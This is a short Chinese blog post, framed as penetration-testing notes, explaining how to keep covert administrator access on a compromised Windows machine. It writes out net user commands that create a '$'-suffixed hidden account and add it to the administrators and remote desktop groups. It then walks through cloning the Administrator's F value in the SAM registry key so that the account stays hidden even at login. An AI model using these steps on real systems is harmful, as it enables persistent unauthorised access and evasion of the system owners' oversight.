Windows下两个隐藏后门用户的小技巧

  1. 用户后面添加$
  2. 修改注册表

我们在渗透的过程中拿到权限之后想要植入后门(3389登陆),net命令添加用户还是太明显了,无论是net user 或者登陆的时候都能看见我们创建的后门账号,今天碰巧看了篇实战文章,记录个留后门的小技巧

用户后面添加$

1
2
3
4

net user defaultuser0$ somepasswordhere /add /y
net localgroup administrators defaultuser0$ /add
net localgroup "remote desktop users" defaultuser0$ /add

这样我们在net user的时候我们添加的用户就不会被显示出来了

不过在登陆的时候这个账号还是显示出来了

修改注册表

regedit打开注册表,然后找到HKEY_LOCAL_MACHINE\SAM\SAM,右键点击权限,将读写权限赋予 administrator

重新打开注册表(这里不重新打开,sam目录下的内容无法展开)

将 administrator 对应目录中的F值复制到后门用户对应目录中的F值

复制完成后,把 defaultuser0$ 和其对应的 0000003EC 目录导出并保存(这里不一定是3EC,具体你看你用户的类型)

然后删除刚才的后门用户

1
net user defaultuser0$ /del


这里defaultuser0$就没有了

然后我们远程桌面连接,输入后门的账号密码就行了

不过据说这两种方法都不是很安全,还待后续挖掘更多的后门小技巧


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:Windows下两个隐藏后门用户的小技巧

本文作者:sher10ck

发布时间:2019-11-06, 20:20:56

最后更新:2020-01-13, 12:49:20

原始链接:http://sherlocz.github.io/2019/11/06/Windows下两个隐藏后门用户的小技巧/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录